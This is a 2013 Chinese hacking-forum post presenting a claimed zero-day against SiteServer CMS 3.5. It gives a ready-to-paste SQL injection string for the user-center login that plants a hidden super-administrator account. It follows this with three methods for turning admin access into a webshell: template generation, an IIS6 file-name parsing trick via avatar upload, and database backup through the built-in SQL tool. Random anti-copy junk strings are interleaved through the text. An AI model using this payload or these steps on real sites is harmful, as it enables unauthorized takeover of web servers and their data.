找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2267|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
3 f: T; X2 {* y# @
8 S* h6 c: C3 @. a; ]stieserver官网:www.siteserver.cn
7 |. x/ E  N: E2 s5 \6 f6 j& `1 N1 ?9 f
, c; Y$ M2 G" C2 B( j: Y
' G6 d  J, `/ S  R% ~# l0 Z* x
EXP:
% O+ d: B0 d8 B; g; z+ I0 B* k$ Z4 D- N6 @
直接访问UserCenter/login.aspx
# T! u0 O: B. S( y/ Y! T7 h  y0 [/ c  o' K

( j' K& Q/ i0 x0 W8 R. U
+ n' F9 ]* b. v, u7 B( `+ U# |用户名处输入:4 w. s" `+ `$ R1 O
5 o) T* a8 K* l3 L9 c) B. \
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--0 x0 H6 r$ Q: x# D5 V2 X1 z

! h. r: {1 p+ `" X8 g4 u 0 I0 {/ c5 e! r+ d( k5 I3 C
+ H% ?, f  U; ]# o
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
0 K) t3 P. U* l$ w4 W/ ?
" J  Z. ?" I& @$ J! o. k 7 L$ @" E% `8 ?" \+ U3 e& \1 l: y
2 S$ |) O+ B2 [% X
之后再访问后台SiteServer/login.aspx用插入的用户登陆7 e& a- l" F" a7 |- Y3 J* h& I

/ J' c2 v& |2 L6 b. [3 g
. Q3 K$ S! T$ m' E& N- W8 v# c4 v9 g$ w/ h" d7 D
后台拿webshell的三种方法:
& i7 o# S& v/ }) i- \6 v% \7 W# K+ t
一、
. v9 T; C! C2 R8 Z+ p. ]+ b7 w0 ~/ u0 f0 b9 V9 `
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx" `9 s7 P& x$ Q% I9 e- a5 C7 S- |

1 k' n$ i7 N# V. u3 E' V3 f二、! F( n2 H' U  x" W
) i0 c5 B( q7 U& x: w
成员权限-》添加用户-》用户名为:1.asp8 ?" v+ E7 D1 W; v

! e' M' f3 W! f5 _! ?http://127.0.0.1/usercenter/$ U1 b! \5 r, k' A  b+ ?/ Z

6 E; i& }; t9 f用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
* r4 v! J- Y& e% U) y/ X* g1 D+ _4 a4 H# V* B5 t
(ps:后台添加用户时不会验证是否含有非法字符)
/ P+ N$ e1 c% c7 L0 T/ {9 j2 g' P4 k. E& b9 x: N6 L
三、" W0 `6 V# G8 ~. h
! c( \: `- n& [- g2 u1 l
系统工具-》实用工具-》机器参数查看
# Z% ]9 c$ ]- G* O可以看到数据库类型、名称,WEB路径  N2 J- [" g$ g! ^

; r! q8 S' k6 i5 C4 ~2 \系统工具-》数据库工具-》SQL语句查询
' A# e1 l$ e. S/ a: [6 J这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。# h* \4 p7 p: S3 ^! S9 l3 i! c
' R, B2 L" e' @+ Z: |, o4 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表